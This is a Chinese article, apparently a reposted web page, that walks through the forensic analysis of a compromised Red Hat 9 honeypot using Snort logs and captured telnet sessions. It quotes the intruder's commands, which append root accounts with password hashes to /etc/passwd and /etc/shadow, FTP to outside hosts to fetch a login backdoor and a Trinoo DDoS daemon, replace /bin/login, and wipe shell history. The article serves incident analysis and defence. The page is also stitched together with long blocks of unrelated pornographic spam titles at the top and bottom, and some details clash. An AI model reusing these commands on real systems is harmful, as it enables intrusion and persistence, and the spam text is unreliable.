精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

系統(tǒng)監(jiān)控:蜜罐分析技術(shù)

安全
本文我將要討論的是對(duì)一個(gè)被入侵的系統(tǒng)進(jìn)行逐步地研究,而工具和入侵技術(shù)不作為重點(diǎn)。我們將集中精力討論如何把信息拼揍在一起,來(lái)分析到底發(fā)生了什么事情。

前言

本文我將要討論的是對(duì)一個(gè)被入侵的系統(tǒng)進(jìn)行逐步地研究,而工具和入侵技術(shù)不作為重點(diǎn)。我們將集中精力討論如何把信息拼揍在一起,來(lái)分析到底發(fā)生了什么事情。我寫這篇文章其目的是幫你在安全領(lǐng)域工作中,如何面對(duì)企業(yè)或組織所遭到的威脅做斗爭(zhēng)。

背景

我在這里介紹的信息是通過(guò)一個(gè)蜜罐技術(shù)而獲得的。這個(gè)蜜罐是安裝Red Hat 9的服務(wù)器。我對(duì)它進(jìn)行默認(rèn)安裝并沒(méi)有作出任何修改,所以這里討論的漏洞都會(huì)存在于任何預(yù)設(shè)安裝的Red Hat 9服務(wù)器中。另外,所有IP地址、用戶賬戶和終端字符在這里都是真實(shí)的,這樣做對(duì)于驗(yàn)證數(shù)據(jù)并給予分析有著更好的了解。Snort是我的嗅探器并且對(duì)于其靈活性、功能和價(jià)格(免費(fèi)),它也是作為入侵檢測(cè)系統(tǒng)的最佳選擇。入侵者采取的所有行動(dòng)都會(huì)被Snort捕捉。另外,在整篇文章中,入侵者的性別已被確定為女性,至于如何獲取入侵者的性別我不會(huì)在此提及到。

入侵

在11月26日的早晨6點(diǎn)43分,Snort提醒我,我的一個(gè)系統(tǒng)遭到了noop攻擊。數(shù)據(jù)包的有效載荷包含noop,它是一個(gè)緩沖區(qū)溢出攻擊的跡象。在這種情況下,Snort已記下了攻擊的記錄,它存放在/var/log/messages文件內(nèi)。注意:172.16.1.107是蜜罐的IP地址。所有其他系統(tǒng)的IP地址均為入侵者所使用的IP地址。

Nov 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

我的蜜罐接受著無(wú)數(shù)次探測(cè)、掃描。然而,這樣的提醒使我注意到,它可能表明系統(tǒng)已被破壞。果然,不到兩分鐘,攻擊者就建立了連接,系統(tǒng)日志顯示系統(tǒng)被破解。

Nov 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0)

Nov 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506)

入侵者獲得了超級(jí)用戶的權(quán)限,而且正在控制著系統(tǒng)。這是怎么完成的,究竟發(fā)生了什么?我們現(xiàn)在就開(kāi)始進(jìn)行分析,把它們拼在一起,一步一步來(lái)。

分析

 

然而我們進(jìn)行分析過(guò)程中,如何知道入侵者從哪里開(kāi)始的呢?入侵者通常從信息收集開(kāi)始,他們需要確定目標(biāo)系統(tǒng)存在什么漏洞。如果你的系統(tǒng)受到了破壞,這通常表明入侵者已不止一次與你的系統(tǒng)進(jìn)行溝通。入侵之前大部分都涉及一些收集資料的操作。因此,對(duì)于入侵者的信息收集階段,也是我們的開(kāi)始。

如果我們從上述情報(bào)來(lái)看,這次入侵發(fā)生在53端口。這表明我們的系統(tǒng)遭到了DNS攻擊。因此,我會(huì)通過(guò)Snort開(kāi)始尋找情報(bào),并尋找DNS信息的探測(cè)。我們發(fā)現(xiàn)DNS版本探測(cè)信息是從同一個(gè)系統(tǒng)發(fā)來(lái)的。

Nov 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53

Nov 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53

注意探測(cè)的數(shù)據(jù),即11月25日。我們的系統(tǒng)是11月26日被攻破,來(lái)自同一個(gè)系統(tǒng)。而入侵者只花費(fèi)簡(jiǎn)短的時(shí)間就把系統(tǒng)攻破,我猜測(cè),它是一種自動(dòng)化工具,是入侵者用來(lái)掃描眾多系統(tǒng)已知DNS漏洞的工具。掃描后離開(kāi),當(dāng)入侵者審查結(jié)果后確定了存在漏洞的系統(tǒng)(包括我們),然后開(kāi)始她的發(fā)揮。現(xiàn)在我們已經(jīng)拼湊起來(lái)了我們故事的第一部分。入侵者11月25日對(duì)我們的系統(tǒng)探測(cè),然后第二天該系統(tǒng)被利用。根據(jù)我的IDS情報(bào),似乎是由同一個(gè)DNS漏洞的腳本小子擊中。但她如何發(fā)動(dòng)入侵的,它是如何工作的?請(qǐng)繼續(xù)看下面。

漏洞

像大多數(shù)商業(yè)IDS系統(tǒng)一樣,Snort可以顯示我們的所有IP數(shù)據(jù)包。我們將使用此功能進(jìn)行分析漏洞。該漏洞的信息是從Snort的日志獲取的(由Tcpdump二進(jìn)制格式轉(zhuǎn)儲(chǔ))。我沒(méi)有限制我對(duì)主機(jī)63.236.81.13的查詢,因?yàn)槿肭终呖赡苁褂闷渌到y(tǒng)。其實(shí)是這樣的,因?yàn)槿肭终咧辽偈褂萌N不同的系統(tǒng)來(lái)執(zhí)行漏洞利用(這是我的經(jīng)驗(yàn))。該漏洞的目標(biāo)是獲取遠(yuǎn)程系統(tǒng)上的一個(gè)Root Shell。一旦入侵者獲得一個(gè)Root shell,她們就可以運(yùn)行任何root命令,請(qǐng)看下面運(yùn)行的命令。

cd /; uname -a; pwd; id;

Linux apple 2.4.18-1.4 #1 Sun Nov 29 22:21:09 GMT 2009 i686 unknown

/

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

echo "twin::506:506::/home/twin:/bin/bash" >> /etc/passwd

echo "twin:w3nT2H0b6AjM2:::::::" >> /etc/shadow

echo "hantu::0:0::/:/bin/bash" >> /etc/passwd

echo "hantu:w3nT2H0b6AjM2:::::::" >> /etc/shadow

入侵者以root身份運(yùn)行多個(gè)命令。首先,她證實(shí)了她的系統(tǒng)(uname -a),目錄(pwd),然后確認(rèn)自己的UID(id)。然后她將兩個(gè)賬戶twin和hantu都設(shè)置為相同的密碼。請(qǐng)注意,twin的UID有兩個(gè)506,hantu的UID有兩個(gè)0。記住,大多數(shù)系統(tǒng)不讓UID 0 telnet到窗口中。于是,她創(chuàng)建一個(gè)賬戶,因?yàn)樗@樣就能夠遠(yuǎn)程訪問(wèn)。因此,入侵者將執(zhí)行Dns漏洞利用從而獲得一個(gè)root shell,然后插入兩個(gè)賬戶。她通過(guò)漏洞利用并在telnet窗口中獲取root權(quán)限僅僅花費(fèi)了90秒鐘。那么,她下一步將作什么?

Nov 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

Nov 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0)

Nov 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506)

獲取

幸運(yùn)的是,Telnet是一種以明文數(shù)據(jù)傳遞的協(xié)議,數(shù)據(jù)沒(méi)有加密。這就意味著我們能夠通過(guò)嗅探器跟蹤和捕獲她的所有擊鍵。Snort已經(jīng)為我們做到了這一點(diǎn)。通過(guò)分析捕捉到的telnet會(huì)話,我們就如入侵者一樣,因?yàn)槲覀儾蹲降牟粌H僅是STDIN(擊鍵),還有STDOUT和STDER。分析telnet會(huì)話后并確定了入侵者的活動(dòng)。

首先,我們的“朋友”telnet(來(lái)自于213.28.22.189)到twin,然后獲得超級(jí)用戶hantu。記住,她不能telnet到具有UID 0的hantu,因?yàn)閷?duì)于遠(yuǎn)程訪問(wèn)這將受到限制。

#' !"'!"# ' 9600,9600'VT5444VT5444

Red Hat Linux release 9

Kernel 2.4.18-1.4 on an i686

login: twin

Password: Password: hax0r

No directory /home/twin!

Logging in with home = "/".

[twin@apple /]$ su hantu

Password: Password: hax0r

第二步,我們的“朋友”FTP到其它服務(wù)器中來(lái)拿取她的工具包。

[root@apple /]# ftp 24.112.167.35

Connected to 24.112.167.35.

220 linux FTP server (Version wu-2.5.0(1) Sat Nov 21 16:48:12 GMT 2009) ready.

Name (24.112.167.35:twin): welek

331 Password required for welek.

Password:password

230 User welek logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> get bj.c

local: bj.c remote: bj.c

200 PORT command successful.

150 Opening BINARY mode data connection for bj.c (1010 bytes).

226 Transfer complete.

1010 bytes received in 0.115 secs (8.6 Kbytes/sec)

ftp> quit

221-You have transferred 1010 bytes in 1 files.

221-Total traffic for this session was 1421 bytes in 1 transfers.

221-Thank you for using the FTP service on linux.

221 Goodbye.

第三步,她獲得了她的后門程序,編譯bj.c并安裝在/sbin/login以將它替換。請(qǐng)注意所有命令提示符下執(zhí)行命令的編譯。

[root@apple /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old                 rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c

bj.c:16: unterminated string or character constant

bj.c:12: possible real start of unterminated constant

她現(xiàn)在試圖執(zhí)行已編譯的后門程序。

[root@apple /]# chown root:bin login

chown: login: No such file or directory

[root@apple /]# chmod 4555 login

chmod: login: No such file or directory

[root@apple /]# chmod u-w login

chmod: login: No such file or directory

[root@apple /]# cp /bin/login /usr/bin/xstat

[root@apple /]# cp /bin/login /usr/bin/old

[root@apple /]# rm /bin/login

[root@apple /]# chmod 555 /usr/bin/xstat

[root@apple /]# chgrp bin /usr/bin/xstat

[root@apple /]# mv login /bin/login

mv: login: No such file or directory

[root@apple /]# rm bj.c

可愛(ài)的朋友,她這次沒(méi)有得到正確的結(jié)果,再試一次。她從FTP站點(diǎn)重新下載了后門程序。

[root@apple /]# ftp 24.112.167.35

Connected to 24.112.167.35.

220 linux FTP server (Version wu-2.5.0(1) Sat Nov 21 16:48:12 GMT 2009) ready.

Name (24.112.167.35:twin): [root@apple /]#   ftp 24.112.167.35

Connected to 24.112.167.35.

220 linux FTP server (Version wu-2.5.0(1) Sat Nov 21 16:48:12 GMT 2009) ready.

Name (24.112.167.35:twin): welek

331 Password required for welek.

Password:331 Password required for welek.

Password:password

230 User welek logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> get bj.c

qulocal: bj.c remote: bj.c

200 PORT command successful.

u150 Opening BINARY mode data connection for bj.c (1011 bytes).

226 Transfer complete.

1011 bytes received in 0.134 secs (7.3 Kbytes/sec)

ftp> itit

221-You have transferred 1011 bytes in 1 files.

221-Total traffic for this session was 1422 bytes in 1 transfers.

221-Thank you for using the FTP service on linux.

221 Goodbye.

現(xiàn)在是她編譯后門程序的第二次嘗試。請(qǐng)注意相同的剪切和粘貼命令使用。

[root@apple /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old                 rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c

bj.c: In function `owned':

bj.c:16: warning: assignment makes pointer from integer without a cast

現(xiàn)在我們看到編譯的后門程序已經(jīng)實(shí)施。有效的/bin/login副本移動(dòng)到/usr/bin/xstat中,而編譯的后門程序bj.c用于替換/bin/login,這是后門程序。

[root@apple /]# chown root:bin login

[root@apple /]# chmod 4555 login

[root@apple /]# chmod u-w login

[root@apple /]# cp /bin/login /usr/bin/xstat

cp: /bin/login: No such file or directory

[root@apple /]# cp /bin/login /usr/bin/old

cp: /bin/login: No such file or directory

[root@apple /]# rm /bin/login

rm: cannot remove `/bin/login': No such file or directory

[root@apple /]# chmod 555 /usr/bin/xstat

[root@apple /]# chgrp bin /usr/bin/xstat

[root@apple /]# mv login /bin/login

現(xiàn)在她開(kāi)始清除她的活動(dòng)痕跡。我認(rèn)為這是一個(gè)腳本,剪切和粘貼。看看她執(zhí)行的所有命令。另外,我確信這是一個(gè)“generic”清理腳本,注意它是如何試圖刪除文件(如/tmp/h)的。

[root@apple /]# rm bj.c

[root@apple /]# [root@apple /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por<grep inetd ; ps -aux | grep portmap ; rm /sbin/port                         map ; rm /tmp/h ; rm /usr<p portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/                         sbin/rpc.portmap ; rm -rf<ap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf                          .bash* ; rm -rf /root/.ba<bin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bas                         h_history ; rm -rf /usr/s<bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sb                         in/named

359 ?        00:00:00 inetd

359 ?        00:00:00 inetd

rm: cannot remove `/tmp/h': No such file or directory

rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory

[root@apple /]# ps -aux | grep portmap

[root@apple /]# [root@apple /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por<grep inetd ; ps -aux | grep portmap ; rm /sbin/port                         map ; rm /tmp/h ; rm /usr<p portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/                         sbin/rpc.portmap ; rm -rf<ap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf                          .bash* ; rm -rf /root/.ba<bin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bas                         h_history ; rm -rf /usr/s<bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sb                         in/named

359 ?        00:00:00 inetd

rm: cannot remove `/sbin/portmap': No such file or directory

rm: cannot remove `/tmp/h': No such file or directory

rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory

[root@apple /]# rm: cannot remove `/sbin/portmap': No such file or directory

我發(fā)現(xiàn)了一些有意思的事情。入侵者通過(guò)generic進(jìn)行清理,但腳本出現(xiàn)了錯(cuò)誤,因?yàn)樗噲D刪除的文件根本不存在。我認(rèn)為我們的“朋友”一定看到了這些錯(cuò)誤信息,因?yàn)樗?dāng)時(shí)在試圖手工刪除這些相同的文件,即使它們不存在。

rm: cannot remove `/tmp/h': No such file or directory

rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory

[root@apple /]# rm: cannot remove `/sbin/portmap': No such file or directory

rm: cannot remove `/tmp/h': No such file or directory

rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory

[root@apple /]# exit

exit

[twin@apple /]$ exit

logout

就這樣,我們的“朋友”安置了一個(gè)后門程序,即bj.c。完成之后,她就立刻從我的系統(tǒng)中退出了。

返回

此系統(tǒng)遭到破壞之后,我把它脫機(jī)并進(jìn)行數(shù)據(jù)審查(比如Tripwire)。不過(guò),我在下周看到了各種系統(tǒng)正試圖Telnet到此機(jī)器上。顯然,那個(gè)入侵者回來(lái)了,最有可能的是會(huì)對(duì)我的系統(tǒng)進(jìn)行更多的邪惡活動(dòng)。所以,我將此破壞過(guò)的機(jī)器繼續(xù)接入因特網(wǎng),好奇地看看入侵者,她會(huì)做什么?果然,近兩個(gè)星期后,她回來(lái)了。我再次使用Snort捕捉她的所有按鍵。看看下面的telnet會(huì)話,并研究如何破壞系統(tǒng),我們將作為Trinoo終端使用。

在12月9日的上午10:45,我們的“朋友”從24.7.85.192發(fā)起了telnet會(huì)話。注意她是如何使用后門程序繞過(guò)身份驗(yàn)證而進(jìn)入系統(tǒng)的。

!"' #'!"# ' 9600,9600'VT9111VT9111

Red Hat Linux release 9

Kernel 2.4.18-1.4 on an i686

[root@apple /]# ls

bin   cdrom  etc     home  lost+found  proc  sbin  usr

boot  dev    floppy  lib   mnt       root  tmp   var

一旦登入系統(tǒng),她就嘗試使用DNS。

[root@apple /]# nslookup magix

[root@apple /]# nslookup irc.powersurf.com

Server:  zeus-internal.uicmba.edu

Address:  172.16.1.101

我們的“朋友”FTP到位于新加坡的一個(gè)系統(tǒng)并下載一個(gè)新的工具包。注意隱藏的目錄.s,她創(chuàng)建了存儲(chǔ)工具。

[root@apple /]# mkdir .s

[root@apple /]# cd .s

[root@apple /.s]# ftp nusnet-216-35.dynip.nus.edu.sg

ftp: nusnet-216-35.dynip.nus.edu.sg: Unknown host

ftp> qquituit

[root@apple /.s]# ftpr 137.132.216.35

login: ftrp: command not found

[root@apple /.s]#

[root@apple /.s]# ftp 137.132.216.35

Connected to 137.132.216.35.

220 nusnet-216-35.dynip.nus.edu.sg FTP server (Version wu-2.4.2-VR17(1) Thu Nov 19 09:21:53 GMT 2009) ready.

她在我們的窗口中插入相同的用戶名,從而獲得了訪問(wèn)權(quán)限。

Name (137.132.216.35:root): twin

331 Password required for twin.

Password:hax0r

230 User twin logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> get d.tar.gz

local: d.tar.gz remote: d.tar.gz

200 PORT command successful.

150 Opening BINARY mode data connection for d.tar.gz (8323 bytes).

150 Opening BINARY mode data connection for d.tar.gz (8323 bytes).

226 Transfer complete.

8323 bytes received in 1.36 secs (6 Kbytes/sec)

ftp> quit

221-You have transferred 8323 bytes in 1 files.

221-Total traffic for this session was 8770 bytes in 1 transfers.

221-Thank you for using the FTP service on nusnet-216-35.dynip.nus.edu.sg.

221 Goodbye.

[root@apple /.s]# gunzip d*

[root@apple /.s]# tar -xvf d*

daemon/

daemon/ns.c

daemon/ns

[root@apple /.s]# rm -rf d.tar

[root@apple /.s]# cd daemon

[root@apple daemon]# chmod u+u+x nsx ns

[root@apple daemon]# ./ns

入侵者剛剛安裝并啟動(dòng)了Trinoo終端。下一步,她試圖調(diào)換受損的系統(tǒng)。注意,她是如何設(shè)置她的VT TERM。這個(gè)系統(tǒng)很可能也有一個(gè)后門。連接失敗,因?yàn)镈NS不能正常工作。

[root@apple daemon]# TERM=vt1711

[root@apple daemon]# telnet macau.hkg.com

macau.hkg.com: Unknown host

[root@apple daemon]# exit

exit www.2cto.com

我們的“朋友”離開(kāi)了,只是回到了以前的系統(tǒng)(137.132.216.35),并嘗試更多可愛(ài)的調(diào)皮行為。

!"' #'!"# ' 9600,9600'VT9111VT9111

Red Hat Linux release 9

Kernel 2.4.18-1.4 on an i686

apple /]# TERM=vt9111

telnet ns2.cpcc.cc.nc.us

ns2.cpcc.cc.nc.us: Unknown host

@apple /}#telnet 1 152.43.29.52

Trying 152.43.29.52...

Connected to 152.43.29.52.

Escape character is '^]'.

!!!!!!Connection closed by foreign host.

te8ot@apple /]# TERM=vt7877

[root@apple /]# telnet sparky.w

itoot@apple /]# exit

exit

在此之后,不少人認(rèn)為以此作為傀儡機(jī)對(duì)其他系統(tǒng)發(fā)起攻擊,入侵者打算利用此系統(tǒng)從事更多的破壞活動(dòng)。因此,我關(guān)閉了系統(tǒng)。

Dec 9 11:03:20 lisa snort[2370]: IDS/197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444

Dec 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335

Dec 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444

Dec 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335

Dec 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444

Dec 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335

尾聲

我已經(jīng)詳細(xì)論述了我的蜜罐是如何一步一步被攻破的,起初使用后門程序,最后使用Trinoo攻擊。11月25日,入侵者先掃描蜜罐的DNS運(yùn)行著哪一版本。第二天,也就是11月26日,她執(zhí)行了NXT-Howto,并成功獲得了root shell。她獲得了一個(gè)root shell之后,就創(chuàng)建了兩個(gè)系統(tǒng)賬戶,即twin和hantu。在此之后,她立即打開(kāi)telnet窗口,獲得超級(jí)用戶的訪問(wèn)權(quán)限,然后下載并安置了她的后門程序bj.c。然后她執(zhí)行一個(gè)腳本來(lái)掩飾她在系統(tǒng)中留下的痕跡,然后她在幾周之后又試圖連接我的系統(tǒng),但它處于脫機(jī)狀態(tài)。最后,在12月9日那天,她進(jìn)行了訪問(wèn)、安裝、然后執(zhí)行Trinoo。就在此時(shí),我把蜜罐脫機(jī)了。

我剛剛涵蓋了分析蜜罐的所有步驟。目標(biāo)是,以確定如何使用入侵檢測(cè)系統(tǒng)和日志進(jìn)行分析被攻破的系統(tǒng)。通過(guò)這種分析方法,你應(yīng)該對(duì)分析被攻擊的系統(tǒng)有更好的理解。如果你想了解更多有關(guān)知識(shí),你可以通過(guò)Email(Hack01[at]Live.cn)與我交流。

最后我還要感謝所有地下組織成員的貢獻(xiàn),在一些特殊任務(wù)中,沒(méi)有他們的辛勤工作和交流是不可能完成的。

責(zé)任編輯:藍(lán)雨淚 來(lái)源: Hack01
相關(guān)推薦

2017-02-14 08:36:56

2011-04-02 14:19:10

2011-06-28 16:47:30

2011-04-02 11:02:24

2015-08-10 14:41:39

Kubernetes監(jiān)控開(kāi)源容器管理

2009-07-13 22:46:18

2011-04-02 10:57:41

2011-01-07 14:05:11

2009-07-02 09:50:19

.NET監(jiān)控技術(shù)

2011-04-02 12:42:42

2018-10-29 07:13:45

2018-10-07 06:00:36

2010-12-09 09:29:44

2011-04-02 13:15:04

2021-04-16 10:32:28

蜜罐網(wǎng)絡(luò)安全

2020-06-15 10:53:16

工控安全工業(yè)控制網(wǎng)絡(luò)安全

2012-06-27 10:33:47

2010-02-24 13:37:56

2021-04-02 09:43:10

Linux監(jiān)控技術(shù)Linux系統(tǒng)

2011-04-02 13:44:04

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

91网站在线看| 久久精品人人做人人爽| 欧美牲交a欧美牲交aⅴ免费真| 亚洲区小说区图片区| 日韩精品成人一区二区在线| 精品国产欧美一区二区三区成人| 免费不卡av网站| а√天堂8资源在线| 中文无字幕一区二区三区| 亚洲aⅴ男人的天堂在线观看| 亚洲精品77777| 日韩在线不卡| 亚洲精品国产欧美| 91小视频网站| 1区2区3区在线| 国产精品剧情在线亚洲| 国产一区二区视频在线免费观看 | 国产成人精品久久亚洲高清不卡| 日韩在线不卡av| 香蕉久久精品日日躁夜夜躁| 欧美一区二区三区在线| 欧美精品无码一区二区三区| 日本孕妇大胆孕交无码| 中国av一区二区三区| 久久国产精品久久精品国产| 国内精品久久久久久久久久| 视频一区二区中文字幕| 国模吧一区二区三区| jizz日本在线播放| 亚州国产精品| 精品国产一区二区亚洲人成毛片| 国产高潮免费视频| 午夜影视一区二区三区| 亚洲资源在线观看| 天天在线免费视频| 成人精品一区二区三区校园激情| 高清国产午夜精品久久久久久| 国产精品欧美日韩一区二区| 一区二区三区在线观看av| 在线不卡亚洲| 欧美极品欧美精品欧美视频| 欧美风情第一页| 俺要去色综合狠狠| 亚洲视频一区二区| 久久国产精品影院| 一区二区三区日本久久久| 亚洲电影天堂av| 欧美做受高潮中文字幕| 亚洲精品v亚洲精品v日韩精品| 欧美男生操女生| 校园春色 亚洲色图| 欧美黄色网页| 日本精品视频一区二区| 成人在线看视频| 欧美xxx性| 色一区在线观看| 99免费视频观看| 深夜成人福利| 欧美影院精品一区| 性欧美极品xxxx欧美一区二区| 伊人久久国产| 欧美系列一区二区| www.com操| 91麻豆精品一二三区在线| 欧美性大战久久久久久久蜜臀| 黄色国产小视频| 国产精品无码久久久久| 欧美美女直播网站| 亚洲精品一二三四| 国产suv精品一区| 亚洲国产成人精品一区二区 | 欧美日韩福利电影| 久久久久无码精品国产| 99热在线精品观看| 国产精品99久久久久久人 | 精品奇米国产一区二区三区| 亚洲欧美日韩色| 欧美日韩麻豆| 一本色道久久88综合日韩精品| 人妻互换一区二区激情偷拍| 91精品精品| 欧美精品videosex牲欧美| 97人人澡人人爽人人模亚洲| 天堂av在线一区| 91青草视频久久| 搡老岳熟女国产熟妇| 久久免费精品国产久精品久久久久| 欧美一区二区三区在线播放| 精品国产99久久久久久| 精品久久久一区二区| 少妇一级淫免费放| 国语一区二区三区| 在线一区二区日韩| 久久综合色综合| 噜噜噜91成人网| 91精品久久久久久久久青青| 丰满人妻一区二区三区免费| 久久久久久久性| 亚洲国产精品女人| 欧美大胆成人| 日韩欧美一级精品久久| 美女脱光内衣内裤| 欧美日韩一卡| 国产精品视频久久| 亚洲欧洲国产综合| 亚洲女人的天堂| 国产精品99久久免费黑人人妻| 永久免费精品视频| 中文字幕av一区二区| 日韩字幕在线观看| 国产综合久久久久影院| 欧美高清视频一区二区三区在线观看| 国产黄网站在线观看| 日本乱人伦aⅴ精品| 午夜男人的天堂| 一区二区三区四区在线观看国产日韩| 欧美性受xxx| 性一交一乱一精一晶| 国产精品伦一区| 草草草在线视频| 女仆av观看一区| 欧美日韩第一视频| 国产精品视频第一页| 国产女人18毛片水真多成人如厕 | 国产米奇在线777精品观看| 欧美国产二区| 免费看男女www网站入口在线| 日韩三级视频在线观看| 欧美特黄一级片| 日本不卡一二三区黄网| 欧美精品123| 电影在线观看一区| 精品国产自在久精品国产| 欧美一级特黄高清视频| 免费观看成人av| 日韩国产精品一区二区| 超碰一区二区| 日韩大片在线观看视频| 久久这里只有精品国产| 国产宾馆实践打屁股91| www.-级毛片线天内射视视| 国产精品.xx视频.xxtv| 伊人久久五月天| 成年人视频免费| 国产喂奶挤奶一区二区三区| 亚洲精品乱码久久久久久自慰| 日本在线中文字幕一区| 午夜精品久久久久久久久久久久久 | 亚洲网站视频| 超碰国产精品久久国产精品99| 尤物视频在线看| 日韩精品在线看片z| 清纯粉嫩极品夜夜嗨av| 国产91精品免费| 国产日韩欧美精品在线观看| 免费看久久久| 日本精品视频在线| 激情小视频在线| 欧美日韩在线播放三区四区| 波多野结衣久久久久| 激情综合网av| 视色,视色影院,视色影库,视色网 日韩精品福利片午夜免费观看 | 最新中文字幕一区二区三区| 天天操狠狠操夜夜操| 久久久久久久久久久久久久久久久久 | 四虎国产精品成人免费影视| 久久久国产视频| 亚洲女人18毛片水真多| 五月天婷婷综合| 国产成人精品无码免费看夜聊软件| 青草av.久久免费一区| 在线国产精品网| 午夜电影一区| 欧美亚洲第一页| av网站在线免费播放| 91精品视频网| 国产成人亚洲欧洲在线| 国产婷婷精品av在线| 亚洲va在线va天堂va偷拍| 午夜日本精品| 麻豆传媒一区二区| 国产精品黄色片| 欧美高清电影在线看| 日本护士...精品国| 欧美色中文字幕| 久久久.www| 久久亚洲捆绑美女| 中文字幕久久av| 国产一区二区高清| 性做爰过程免费播放| 成人黄色av网址| 国产精品久久在线观看| 欧美人与禽猛交乱配| 亚洲一级免费视频| 国产91绿帽单男绿奴| 在线视频一区二区三| 欧美成人aaa片一区国产精品| 91视频91自| 肉色超薄丝袜脚交| 美女精品一区| 日韩精品一区二区在线视频 | 色网站在线播放| 国产精品二三区| 国产精品无码永久免费不卡| 韩日av一区二区| 国产性xxxx18免费观看视频| 自拍视频亚洲| 亚洲啪啪av| 天堂成人娱乐在线视频免费播放网站| 亚洲尤物视频网| av亚洲一区二区三区| 欧美极度另类性三渗透| 黄色网页在线免费观看| 亚洲人成在线一二| 欧美一区,二区| 337p亚洲精品色噜噜噜| 中文文字幕一区二区三三| 偷偷要91色婷婷| 欧美日韩三级在线观看 | 欧美成人精品欧美一| 国产欧美精品在线观看| www.色多多| 成人精品一区二区三区四区| 亚洲精品乱码久久久久久动漫| 日韩和欧美一区二区| 97国产精东麻豆人妻电影| 狠狠色综合网| 激情六月天婷婷| 亚洲va在线| 中文字幕在线乱| 97精品一区| 亚洲综合视频一区| 日韩精品免费一区二区三区| 清纯唯美一区二区三区| 天天躁日日躁狠狠躁欧美| 好吊色欧美一区二区三区视频| 无码国模国产在线观看| 97人人干人人| 日韩精品中文字幕吗一区二区| 成人免费黄色网| 亚瑟国产精品| 91最新国产视频| 精品视频91| 3d精品h动漫啪啪一区二区| 成人自拍视频| 97影院在线午夜| 日本在线视频一区二区三区| 亚洲综合视频1区| 日韩有吗在线观看| 91精品天堂| jizz久久精品永久免费| 国产精品嫩草在线观看| 成人中文字幕视频| 精品免费视频123区| 综合亚洲自拍| 日韩精品av一区二区三区| 欧美精选一区二区三区| 婷婷四月色综合| 羞羞答答成人影院www| 日本在线视频www色| 欧美日本不卡| 欧美大片在线播放| 久久久噜噜噜久久狠狠50岁| 91n.com在线观看| 精品一区二区综合| 不许穿内裤随时挨c调教h苏绵| www.视频一区| 亚洲一区视频在线播放| 一区免费观看视频| 欧美日韩大片在线观看| 婷婷一区二区三区| 青青草视频在线观看免费| 欧美日韩一级大片网址| www.av黄色| 日韩av在线免费观看一区| 国产日本在线| 欧美激情奇米色| 香蕉久久免费电影| 91免费视频国产| 性欧美xxxx免费岛国不卡电影| 亚洲免费视频一区| 狠狠综合久久av一区二区老牛| 欧美 国产 综合| 久久成人久久爱| 特大黑人巨人吊xxxx| 中文字幕日本不卡| 国产成人精品a视频一区| 欧美日韩高清影院| 欧洲成人一区二区三区| 在线看福利67194| 日本不卡影院| 国产精品视频最多的网站| 日韩三级网址| 午夜精品短视频| 亚洲巨乳在线| 91热视频在线观看| 久久这里只有精品视频网| 欧美在线视频第一页| 